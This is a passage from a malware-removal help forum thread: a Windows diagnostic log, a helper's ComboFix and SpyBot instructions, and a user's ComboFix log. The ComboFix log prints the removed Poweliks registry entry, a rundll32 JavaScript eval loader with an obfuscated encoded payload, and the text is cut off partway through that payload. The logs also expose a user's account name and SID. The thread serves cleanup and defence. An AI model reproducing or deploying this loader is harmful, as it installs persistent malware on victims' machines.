Description: HP LaserJet CP1025nw
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: HP Color LaserJet CP2025dn
Description: HP Color LaserJet CP2025dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: HP LaserJet Professional P1606dn
Description: HP LaserJet Professional P1606dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: HP LaserJet P2035n
Description: HP LaserJet P2035n
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: HP LaserJet 200 color M251nw
Description: HP LaserJet 200 color M251nw
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: HP Color LaserJet CP2025dn
Description: HP Color LaserJet CP2025dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (08/25/2014 09:26:47 AM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\TEMP\SCOPED_DIR_1844_26067\CRX_INSTALL\_LOCALES\FIL\MESSAGES.JSON> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/25/2014 09:26:47 AM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\TEMP\SCOPED_DIR_1844_24331\CRX_INSTALL\48.PNG> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/25/2014 09:26:47 AM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\TEMP\SCOPED_DIR_1844_24331\CRX_INSTALL\32.PNG> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/25/2014 09:26:47 AM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\TEMP\SCOPED_DIR_1844_26067\CRX_INSTALL\_LOCALES\FI\MESSAGES.JSON> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/25/2014 09:26:47 AM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\TEMP\SCOPED_DIR_1844_24331\CRX_INSTALL\16.PNG> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/25/2014 09:26:47 AM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\TEMP\SCOPED_DIR_1844_24331\CRX_INSTALL\128.PNG> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/25/2014 09:26:47 AM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\TEMP\SCOPED_DIR_1844_26067\CRX_INSTALL\_LOCALES\ET\MESSAGES.JSON> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/25/2014 09:26:47 AM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\TEMP\SCOPED_DIR_1844_26067\CRX_INSTALL\_LOCALES\ES_419\MESSAGES.JSON> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/25/2014 09:26:47 AM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\TEMP\SCOPED_DIR_1844_26067\CRX_INSTALL\_LOCALES\ES\MESSAGES.JSON> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/25/2014 09:26:47 AM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\TEMP\SCOPED_DIR_1844_26067\CRX_INSTALL\_LOCALES\EN_US\MESSAGES.JSON> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
 
System errors:
=============
Error: (08/25/2014 09:53:10 AM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)
Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC)
 
Error: (08/25/2014 09:41:01 AM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)
Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC)
 
Error: (08/25/2014 09:31:53 AM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)
Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC)
 
Error: (08/25/2014 09:21:25 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (08/25/2014 09:20:08 AM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: KtmRm for Distributed Transaction Coordinator2147942438 (0x80070026)
 
Error: (08/25/2014 09:18:52 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: AVGIDSDriver
AVGIDSShim
 
Error: (08/25/2014 09:18:51 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: vToolbarUpdater%%2
 
Error: (08/25/2014 09:18:51 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: AVGIDSAgentAVGIDSDriver%%31
 
Error: (08/25/2014 08:23:12 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (08/25/2014 08:19:07 AM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: KtmRm for Distributed Transaction Coordinator2147942438 (0x80070026)
 
 
Microsoft Office Sessions:
=========================
Error: (08/14/2012 04:50:33 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 3, Application Name: Microsoft Office PowerPoint, Application Version: 12.0.6600.1000, Microsoft Office Version: 12.0.6425.1000. This session lasted 228 seconds with 60 seconds of active time.  This session ended with a crash.
 
Error: (12/21/2010 06:24:53 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6545.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 61 seconds with 60 seconds of active time.  This session ended with a crash.
 
Error: (10/09/2010 05:15:00 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6541.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 19 seconds with 0 seconds of active time.  This session ended with a crash.
 
Error: (03/25/2010 00:21:12 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6504.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 60 seconds with 0 seconds of active time.  This session ended with a crash.
 
 
CodeIntegrity Errors:
===================================
  Date: 2014-08-25 09:48:31.237
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-25 09:48:31.054
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-25 09:48:30.886
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-25 09:48:30.700
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-25 09:48:30.286
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-25 09:48:30.009
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-25 09:48:29.734
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-25 09:48:29.432
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-25 09:47:50.973
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\NisDrvWFP.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-25 09:47:50.762
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\NisDrvWFP.sys because the set of per-page image hashes could not be found on the system.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core2 Duo CPU E4600 @ 2.40GHz
Percentage of memory in use: 65%
Total physical RAM: 3060.46 MB
Available physical RAM: 1043.32 MB
Total Pagefile: 6355.21 MB
Available Pagefile: 4190.75 MB
Total Virtual: 2047.88 MB
Available Virtual: 1907.04 MB
 
==================== Drives ================================
 
Drive c: (OS) (Fixed) (Total:450.71 GB) (Free:221.74 GB) NTFS ==>[Drive with boot components (obtained from BCD)]
Drive d: (RECOVERY) (Fixed) (Total:15 GB) (Free:10.55 GB) NTFS
Drive g: (IT Drive) (Fixed) (Total:465.76 GB) (Free:188.98 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 465.8 GB) (Disk ID: 10000000)
Partition 1: (Not Active) - (Size=47 MB) - (Type=DE)
Partition 2: (Not Active) - (Size=15 GB) - (Type=07 NTFS)
Partition 3: (Active) - (Size=450.7 GB) - (Type=07 NTFS)
 
========================================================
Disk: 1 (Size: 465.8 GB) (Disk ID: BADAE880)
Partition 1: (Active) - (Size=465.8 GB) - (Type=07 NTFS)
 
==================== End Of Log ============================
Link to post
Share on other sites

ComboFix failed to delete the infection, probably due to SpyBot working in the background. I recommend to uninstall it, as this program is too weak for today security expectations.

Also delete your version of ComboFix (simply move it to your Recycle Bin) and obtain a fresh one from provided link before the next scan.



warning.gif SpyBot S&D Warning

MVPS.org is no longer recommending SpyBot S&D due to very poor testing results (scroll down and read under Freeware Antispyware Products).
My advice is to get rid of this program. To do so:

  • Press the WindowsKey.png + R on your keyboard at the same time. Type appwiz.cpl and click OK.
  • Search for SpyBot, right-click the entry and click Uninstall.

Please do it, cause it may hinder the removals.

 

 

51a5bf3d99e8a-ComboFixlogo16.png Scan with ComboFix

This is a very powerful tool that should be used only if advised by Malware Analyst.
Do not run ComboFix on your own!


Referring to this instruction, please download ComboFix by sUBs and save it to your desktop.
Temporary disable your AntiVirus and AntiSpyware protection - instructions here.
If you are a user of CD emulation software (like Daemon Tools or Alcohol) also disable it for the cleaning process - instructions here.

  • Right-click on 51a5bf3d99e8a-ComboFixlogo16.png icon and select RunAsAdmin.jpg Run as Administrator to start the tool.
  • Accept the disclaimer and agree if prompted to install Recovery Console.
  • Do not take any actions while ComboFix goes through your System - it may cause it to stall!
  • This scan may take some time!
  • When finished - it will display a logfile (located also on your main drive, usually C:\ComboFix.txt).

Include that log in your next reply.
icon_idea.gif If you'll encounter any issues with internet connection after running ComboFix, please visit this link.
icon_idea.gif If an error about operation on the key marked for deletion will appear after running the tool, please reboot your machine.
icon_idea.gif Don't forget to re-enable your previously switched-off protection software!

Link to post
Share on other sites

Programs and Features does not show a Spybot entry. I have also looked for it in the Start Menu as well as C:\Program Files. There are no references to Spybot in either of these locations either. Since this is a 32-bit OS, there is no Program Files (x86). So, no need to look for Spybot there.

 

Any recommendations?

Link to post
Share on other sites

Here we go. Combofix log:

 

ComboFix 14-08-24.01 - savas.kyriakidis 08/25/2014  10:55:04.4.2 - x86
Running from: G:\ComboFix.exe
.
.
(((((((((((((((((((((((((((((((((((((((   Other Deletions   )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
.
CLSID={AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} - infected with Poweliks and removed.
You should verify if current CLSID data is correct: 
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}
   <NO NAME> REG_SZ         Thumbnail Cache Class Factory for Out of Proc Server
   AppID REG_SZ         {AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\InprocServer32
   <NO NAME> REG_EXPAND_SZ   %SYSTEMROOT%\system32\thumbcache.dll
   ThreadingModel REG_SZ         Apartment
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\localserver32
   <NO NAME> REG_SZ         rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]|bc9:13c5.1:db.5cc7.c89e.b9g6:18e6~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);}))
   a REG_SZ         #@~^WX4AAA==n{F+2im'xh,)mDk-+or8%mYvEUmDb2ORUtVsJbIStrVc+e'*+* Y.zPhxlc3XwC NAx\bDKU:xO?DDrUT/`rYhbxNb.YJ*ia'A_Ew'/z/Dn:2 wwSkx[GS/2WSnM/4V^--7FcT-'wGhDd4VVcn6Ji6xU+SPzmOk-nor8L^YvJj^MkwOr o sbs?zkY:r(L^Yr#I0!x^ObWx,^N `#PO.XPDY;DU~mR]+T]+mNcE_|S\w'/G0DAmDn'-skmMWkG0D-wxY~WMl:AWM3PknOEa-'x[www7  !cX!F {w'/wEbp8^lD^4`n* M+Y!D ~!p8N0!x^ObWx,[`!# XxU+SPzmOk-nor8L^YvJ\dX:V+ U+.\.oHJ_K:nR+RZE#p6 Wa+UcrM2:E~!~0msd+*iXRd+U[v#IE6U'mR3aalx[3 \rDKUs+UD?DDk okcJuYn:a]wwr#_! /!4/D.rxT`!RsldO&x[+X60vJ&E*_FbI!0UY{;6xQrRD:wri!WY{0 ZM+COK+XOsbV+v;WxD~DD;+SR8#Ik6cE6Yb`!0Y MkO+vacDnkwKx/AK[X*i;0DR/sK/+vbi!0'6 /DlD+P+aOwks+v;0 ~O.!+#I;6Yx0c!YobV`E6xDbi!0d'!0O }w+ )/:+6DjODls`bi;WkR]+m[`y#I;6R.rD+cE6dcInmNvE0DRUryO+#*i;WkRZ^G/`#p;WR;VK/n`bI6R9+^nYsrs`EWUD#Ilc]!xcr-rJ_!0 QJ'J~z$ErnDPz GD/Ym.OJB!BFbiW G+s+DnsbVnc!0xbI)8Atbs`Z6RwkV2Xr/D/cw*#`r6`m9U`*''Zb`NvJr#I8[crtOYalzJNGA VWC[c:rmMGkWWDR1W:JNKAx^WCNJb&{J*zz{*~Z!8{Rv2ZAO*G9 %obWRbwAX/yFA)/lc&bU9WAkvc!OnAO%O&TOX% s/Erbi)`lc3U\bDKxh+UOvJKDK^+k/Eb*`JCE*'Eka,`,:+XYRAx1GNbxLT=))j;qqc!+D?YMrUov$;WU\n.DTl)w.WsACdvcjOMkUovv9CBl+y}F(:gTlq,;qVNVn8At1hsDqZ48iMwXIqV[!jXFs~-myVTCq,EKPz/Pw;\MoZ429*h?"im .s|j!L 8I*1!.((.ZLBs~t1:oYtp"V^xtd8A4^ssYtp"V^k4}(&HaNVV\(LZa|j!L8IX^V.N&/IU}("q^:lj($VK#D8 ^V(U3{BwI*^!jZ[^d\M#HnjYA1C~34yF4lq*[6Nwf9p9H}lT]MOYIsEJV"Vt:^;}`IX8ssYC gA^&gs(Bk+UoW::jfS`,rls.%[;AKp1Z}Z;i:j:(M#L[!^\8kl$m21s8q9/nilt8`G&VB^}s6VI&"s}AIs4V.UeoIV&r3aSsDPn(g!\TEihj:8Mj%NVV-8b*s8 ^!J3w"1 #D5s6*5xj24VIsm0s%ey.y1q!+rVxq8k0E"M#:C lV]C^;5qF2eZF\tuj/t?TrUXg}qF\1x^H4yIq4VjrJ;I:I 6.}?0;]Mj:mXV#u^ht?TrN;qd(01/epgyJs~qI:aa5H6K\wd}qpdpq*"C`1/Ip1.S2wq[MOf(Moy^z&/ FgXm2Is8U*1[ X!Cg41&]A}q6V\ wT}j!2rHIinoAV5U.a4M"s^kl2\tw8hjf8 l"N_9qe2I\^rTkiV"P1M#Nlqs/::wO}U6(lqIs} VKm mkjCjr8M^L&ka4if^y[MjOS^9sts6Vef"w8 W;5 ok4VVE\!g-4 }s4 I28y*yoPW+j&"48:"t1:}/Bo~t^:wO}oIs^ HwJsgV[2^O1Ma^4q.E9MwTlq,;Is64t2HW&s984x"28`/:oEe 9VtZ&2rHIinoAV}Ujw8M"s1kXA}q}w(:jH}oIG4ypG(0VE9h,M}?&d(V~FI:awezXqC"sp VPCqm/Phj&i X-9Zaqlo9!9wdqbhVjs.T[o9EjuVS}?SViMwXIqV[!jX^X0;jy.TjqFh8!jYtlTI(]a4y*M(MwUmHorj .;[VVY\j6g5l4t j3&kVG^hj![(x;q;IinoAV}Ujw8M"s1kXGms.t9Mji+oAs|;3{Wq}F(h1ZlO;(M9tF$t^hwY(Z48jVszeqFV[!jXFs~-1 sZlq,EhKzdKqs;}VsT829*hjI`mxjsF.ZoqFH!^h^EtFZL9AF-t_./tjX4iMwzIq^NV.Xns~-myVTlq,;K:2/: s!}MwT8&x*h?]j^UjVF.ZL81T^sVEtqZoBs~z( H^}_.X\?0{9w1Xm2Is8`sy1+.D5:XXK.DA1C$28+8tCl[rNw9[o9Xt l!]MOOIs!S0NV92w"my.O5s62toHWnp6olMjzt?8nI:2Vef"GBsR;Iy6-ess/}pgyt8r(CsG5q1W\?zOpq*Vq;IWJ06\I+sZlO;JVgh(Ms!F/xmpZ&2H!apU*s^pjt8CtG&VHlm2IV(?lV4Vhr|o!{Bw.E1+ss}jl4[M^ \jqV[!4\tCt19w1X^2IV8iwy^ jOI:alS0NV9s"XmVjGq0F2e29\1+,sNZlpCWytkX.8Ugtt:j65oI2[s.1tp"W8 ""&kVFms.!9(x;q;I#4 14ts.rIpIaN:jHt("W( ]yJV9V[28sNVt-t;ok]+j!iCx-I!o0}_9V1&tr|U*B4 }-CyjWx!*84MSd}Z44`&sy[!jYJVxq4 I28qjEj l!t(x-1sH^m }wI j"S0t44sIdtj9V\s!KK:jfJjOkm:#L[/~Kn(gT}q!;i .E[!^Yt?lB(x]^ms,h` jzNsV%}oH;jVsE\!6^j:jhFZ4r\(^YP+x;tgTqAV;[wA!^r0/Bsj;1 os}`*t9M^+}`FsNVt-t_HE"+.ZKjTCMO3nZBCtp"18 "q4V.(eq*38!`kF?lB(xt7lyjWxMlq4Vhdp;oVPq,39 6^|?02F?S3`CB\e+j3[(xs|U3{WjYZnp"V F8[&Z]SnjYf( l+}o9T(:W] 9\(i94m `+Hsg!1:sEtzTk#V^+mym.nV,t8p"}e8 (sj.8V("&~Xs,dIsFdC_sk( snjVa* wYj:qw##9V#!9Am8w-8A}\]h46PKx4UVB4?^Vtm3aOlj.pl8Nu82.l(+6VmMXG^.aCIj2?e 4}e8*4qV##2s(]+w|i:w*(sj.2.lU!jfp`s$pooA As( 6l}28V]x4qj:4k]i4qi:gGmy9u6qwcCq41}j^T5j]VKZI&5(4p+GAejjIu6qtl: IVHjj*^s^E:24?t!4We ldp t. V1AP "M^!jV(M]VIAt?IVxX5N96p oA#.Il"q9lV9rjsxkC2L6oaM[:99K_V!t`6f#+w2t.gfq]:.Z6Lj2g6.^wU+b,X[ V;`sqMlX]#:82UV#: hKX[ D!H`9.t`p\[f4*H:O}d!]&j:.n}MTa+s,T.01B[A1pUpIwIj42]sa:\!oa63dhtjg9kv1/n`6(}qghijxu"f4 jvsad&wf}v.2?^tsn`w?\#1VN!A.]9x5joAPfgHCKwo:5*8`65tp^HtMj2:sBsl`62Ug}N_NjIVViZNxtsoWpjw}j ^.ty$;##4I}?OBmw9hiZ6?tU^H M\]"fBxmA.Z\2A+j0q"jqI]8b,?\UVA}:\fp:gfj!]:tu9rtswk?sis}zwjtsgr#mx$x[g4ac*u("6r`va5z9r}`i*"uanimx/\jxD5!}D}P^*HL"}1Ap"#`Iw o4&Jy~egMVSGInts4.5y,pK^9%}^s.9%Vqr2^T\jg99#I}VjA}j^(IZ9/]`sA]f~Aejw$9!o~p`py9L^.`N-pU%X}Zw?\hVVN!A.]j\x"joAjp"H#3^64GV$}ZhDi3OD]f9V:2txHj.C`!w+jNt181f w1guIdp!^"njRcgKBA8f\nCMgdHA}t[GVfjp"*]2^(U2B;I`sA5.z"l:1-I`2-C wh5j/.j&9rJFx:`!]&C 1F#M\j+owt[_Np}#~&CK5+5jo~p`sxt&9/IAs/Hw1t\:tA`pVtIC9}j.j:}.e!j XMHj^epqI9[`65[qw2 M\51347mZIWI!&qp^2.H2NK^Ztwt9HZlVj]jjw/"Z13t#5\#:\9?02tiaizjiz&}j4e\MVSGIx}Mg#}2W*pqIr[`6;1#s~pjw9jV"V5!a;^iwA}jw9KG99[V.r}#~9tyxet2ohm.9wt.4UK8}eHV1#Z*9hwU1:l]Ca5m!sw#s4&]f9%ww- w13}p^ZHCI*`2o~p`ph5j8jpj9aI_tfP;,j\VqX1jw!\K^A`21w\TjsCM\CHomT[AVpjp"1}!gG1jo_4Zq\tFjBp:t5S.As^Z11}39sMX+jx9W5joxtp99}.w$pj} sZ]+9APjw$5(t pjsA5jxp5qN3SZ}4no9f`TNt13^e[25!j2XAiiwA#Kw%+NqaPs%\["4A}j\ed&]Gjq,A`jw$Ko19K;,t[0%cgUq7IVgX^!gK"!t&}jDnC:9op`sB^.3\jfg|j.9G1&B lyt\kOer:VG4yNJHAw9`U}b.:\hex4d`oq}i5\\K"epqI3\`stj!^F}Fg!`sjjqYC`ZOelV1/HA6B[^sSt#sMIjX.]2wI5jon6iIX}O+js3"iqYsjPAcj3xP:CsyKyYcmFw#I0s9I_N$#HYA5Vs~pjO"}!Zc5!t&}jDsj9op`su8Zttj#gF}Fg!jk1W.sYX5DGloWAN29$Cytx}osglMg/\jj5xoK#+^1^:9.l;%fiqYS}ijA}.z-qMo;j`Yfmj96j01]j.}6w5\Uf1n?.^e}j5!jM#A}iwAPK4/pqN\`F1ipgW]f\6jjq"mytL\F95.ZIoKAVp8ZVt:hV8pFg!#kOcj:OX} DWty4]Kqt%}Ns?H+D.} 9-mMVWIZ*.5j9F.01]jqVG}0sW:VWX|FgT]jaZ5:0Fj""|j.\!48IJ6Aw9i#9X}jw$5.#_ljVX9 DG.s6eSZ}e}21f`TNA+2x*^jwM5Ve\HqwDj!wop`s}J8tttTl\\2k*U3sq;,MjFg"p81uI_t$n`}&Uo}I}&KaPj8I1 42\T^SnC9 5ZF]^ytAiiwA}jDoqjH24yo\g!w$I`s$pqs6i2}f`T}o.:I*#:gS9!29 #~s]j"}5^ja}^5\HqwDj!wo5jo5S8t\`:9\pyV!.;%f}`ss5is~pVw]i3wA5V3\HqwDj!wop`s}J8tWtugpCsjinX07rq,AUjw$p`}6.b,*#y,69+YKfw+J&"f`.#AiiwAJ&4#529$Cyt5Cs~A s^("jH~I`sA:j^op`}pKGNBiV/DUit.mjwo}jwMqV4;##wDjj\/4ZsUj`sAi94j3DfU3so4ZNt\!\apo5*.0,J[Zw9qp}2}XRfJ!5!`!HA}iwAPK49Ks}9ijs6HUjX^Kx-5F[_48sl( Xo?09]+ N!6qFwj#sMIXsPVxf`.#.]hxqi3g]}y}f}`sAt%4]!DfU3s\As3j.a-SH%-Sy5aeb,M`T1.pFgu]x9qjKB;##wD]2\9K^99ij..]hw|t3g]q?1W.q,X5DGlV1/H`tt[A.|5VYt+j8(^2gAnyB*eT4x}!9tI_Vue`w2i 9|} ^u:C48mZY9L4 ?AYf?0VtiA3\tPV^l?D tC1X(!ottT5\t2g]KU,*#:AX} DWtXO5d ]hHjst:w(p81(4Z9+eb%\tip7I:w9^3gKUC(X#s9re3gPKqNsn NA}iwA#KwCqMoDNwVt(.\Olj.pKjNu^_Vl(+6Vl:XG^xYIj2? Vx}e8 4qV##81(]f~y :Od":aVl_s1t:wFj^wCqs5jsFwj#N\.!9-[.a\(2tY8!46 394?^9CnwV16p"YC.jp\oD+wVl( X!4ZN4?^94jsFwj#}NNj5.\3wA"24?##x1eLx!l2oA#0Vj]+Xwe&gV"V]_I VVj.\O+GA jq.o]ZV5jV6&jV"jjsa5`Voc\o`!e ZXl^s%tA}p]qxDe 8 ((LS.0sLt!OBw.\?w9jCAIkt!68+f~#e w5`x$}e+"Mjj9*mV.O#ZV5iq"qi:"j"M(SK Vcts4t^N!Hww%tA5y" 685ygijsxV5:4k8il/CjI"l2oA#q,? !4ht28V"3aVjs,L(.\O+GA#N8VpiZV5j36&j:jG#Mj5:3Bc\o4ye39*N^3*tA5c]VWhe 8d((LSGAk(jBV}r?w9 i }k"q.++f~ j8wgOkP "MF!1Xm8wpjAt?tUT6t2"H(LS.`sH(.x"50VG}A9HtA}f"".k}243jsxICH3\hS nf~#j`6Oi 1kj 43]38V"xo;1AFn1VxOlj.pm2oA#2.Dj 2HlL92jf9&5jol8+XM[39PlAF$}`sAP "M^&tz5#M.sFcts1zHsN(?w9rCV*v\Uw++f~pF!\s(j]yP "M[&".?.V6\qFc\o4C}3Xq:so~+`I&5(^\rAV"H^w-PbYH5hoXKf"TF!89tjX;j X3e!g+1q3A\oNA6!8r]3"OUFt;.ZF1(sw6l^Arp8se#`W\to}2}yta[!"q:Msx\"w&]24]r`%-}Nscjp56^2^T"F$xNA.1UM93+V,T1AwB[AV9UpI"?2^T}j9A`ZOA69"2\Odrow3i;,w#Px9C.\p"sIHq,wj.\UK.tHjVt-#`sA5iIHIMOT\399(fohPf\fCKwpIq3A\0Vw\o41]f9%"#xmZFFq(t*}yN}KyV#\o1;j#}wp?RT^sx(j25 3gHiV49Kw}p[Zphjp~s}Vj]gVB;.0.3`W-j^t9IV}e}jAL9#NA}V4$iM"I:!2:#qg|#s9XK^Iiiow&}+Xre3^T::Bxmw.Zjsw3+`IA.`IiiNsZmT1A|!AXnKI!`f]2\qj2C.T"jq3"\q,?H!S*ej"T}.s&?Z}.tjO6j^sGjU%a#sYw}i1tjaXPMaZ5!oA}iwACK"]jqt$}`sA}#~SC.\ (!Tl? sM"kR"row}H^1B8A}}"u}AIf"4jjwA5jo;#ij1C.j my3A# 1w[TwvJ&96":oxmw.pjVA+I0IGH`9.t`p\9fAlrs^}J!gE`jqx\o\y]3jt1yIp} 3XPf"}e?OtjVXjotsU(goKjs6.ss$P0}tU 6053^"jK\vU!a3#+^| s49K^I3]`1w\q\&]f1qt2X0jjA!m:kfr:1#?H%A# NIqicl5!x!nK`!:LsL}VIh]ZRXIs9B[A*kjpg1Cj"+:M]Nm 9fq("!50V"IqN-8A}}UPsVI!\/#s`!tjt]V5\#V9jjU%a wswJTgri:jG`.iXKZ*?\:4]S.s l8.}6j5hU 